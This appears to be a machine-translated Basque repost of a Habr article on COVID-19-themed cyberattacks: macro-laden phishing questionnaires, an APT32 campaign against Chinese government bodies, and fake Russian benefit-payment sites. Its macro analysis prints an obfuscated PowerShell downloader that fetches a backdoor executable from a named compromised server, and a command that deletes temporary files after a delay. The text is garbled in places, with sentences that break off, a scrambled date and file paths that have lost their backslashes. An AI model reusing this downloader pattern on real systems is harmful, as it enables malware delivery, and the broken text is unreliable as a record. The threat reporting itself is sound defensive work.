Erasotzaileek COVID-19 gaia ustiatzen jarraitzen dute, eta gero eta mehatxu gehiago sortzen dituzte epidemiarekin zerikusia duen guztiarekin oso interesatuta dauden erabiltzaileentzat. IN
Gogoratu barruan
COVID-19rako doako proba bat nahi al duzu?
Koronabirusaren gaikako phishingaren beste adibide esanguratsu bat izan zen
Erabiltzaile gehienak makroak gaitzeko konbentzitzea ere erraza izan zen. Horretarako, trikimailu estandar bat erabili zen: galdetegia betetzeko, lehenik makroak gaitu behar dituzu, hau da, VBA script bat exekutatu behar duzu.
Ikus dezakezunez, VBA script-a birusen aurkako antivirusetatik bereziki estalita dago.
Windows-ek itxaron eginbide bat du, non aplikazioak /T <segundo> itxaroten duen "Bai" erantzun lehenetsia onartu aurretik. Gure kasuan, scriptak 65 segundo itxaron zituen aldi baterako fitxategiak ezabatu aurretik:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Eta itxaron bitartean, malware deskargatu zen. PowerShell script berezi bat abiarazi zen horretarako:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 balioa deskodetu ondoren, PowerShell script-ak Alemaniako aurretik hackeatutako web zerbitzarian dagoen atzeko atea deskargatzen du:
http://automatischer-staubsauger.com/feature/777777.png
eta izenpean gordetzen du:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ
komandoa duen 'tmps1.bat' fitxategia exekutatzean ezabatzen da cmd /c mkdir ""C:UsersPublictmpdir"".
Gobernu agentzien aurkako eraso zuzendua
Horrez gain, FireEyeko analistek duela gutxi Wuhango gobernu egituretara zuzendutako APT32 eraso baten berri eman zuten, baita Txinako Larrialdien Kudeaketa Ministerioari ere. Banatutako RTFetako batek New York Times izeneko artikulu baterako esteka zuen
Interesgarria da detektatzeko unean, antibirus batek ere ez zuen instantzia hau detektatu, Virustotal-en arabera.
Webgune ofizialak behera daudenean
Errusian gertatu zen phishing-eraso baten adibiderik deigarriena herenegun. Horren arrazoia 3 eta 16 urte bitarteko haurrentzat aspaldian itxaroten den prestazio baten izendapena izan zen. 12ko maiatzaren 2020an eskaerak onartzeko hasiera iragarri zenean, milioika Estatu Zerbitzuen webgunera joan ziren aspaldian itxaroten zen laguntza eskatzeko eta ataria ez zuten DDoS eraso profesional bat baino okerragoa izan. Lehendakariak "Gobernu Zerbitzuek ezin izan diotela eskaera-fluxuari aurre egin" esan zuenean, jendea sarean hitz egiten hasi zen eskaerak onartzeko gune alternatibo bat abian jartzeari buruz.
Arazoa da hainbat gune aldi berean lanean hasi zirela eta batek, posobie16.gosuslugi.ru-ko benetakoak, aplikazioak onartzen dituen bitartean, gehiago
SearchInform-eko lankideek .ru eremuan iruzurrezko 30 domeinu berri inguru aurkitu zituzten. Infosecurity eta Softline konpainiak antzeko 70 gobernu zerbitzuen webgune faltsu baino gehiagoren jarraipena egin dute apirilaren hasieratik. Beren sortzaileek sinbolo ezagunak manipulatzen dituzte eta gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie eta abar hitzen konbinazioak ere erabiltzen dituzte.
Hype eta ingeniaritza soziala
Adibide hauek guztiek baieztatzen dute erasotzaileek koronavirusaren gaia arrakastaz dirua irabazten ari direla. Eta zenbat eta gizarte tentsio handiagoa izan eta arazo argiagoak, orduan eta aukera gehiago izan iruzurgileek datu garrantzitsuak lapurtzeko, jendea beren kabuz dirua ematera behartzeko edo, besterik gabe, ordenagailu gehiago pirateatzeko.
Eta pandemiak prest egon daitezkeen pertsonak etxetik masiboki lan egitera behartu dituela kontuan hartuta, datu pertsonalak ez ezik, datu korporatiboak ere arriskuan daude. Adibidez, duela gutxi Microsoft 365 (lehen Office 365) erabiltzaileek ere phishing-eraso bat jasan zuten. Jendeak "galdutako" ahots-mezu handiak jasotzen zituen letren eranskin gisa. Hala ere, fitxategiak benetan erasoaren biktimak bidaltzen zituen HTML orrialde bat ziren
Iturria: www.habr.com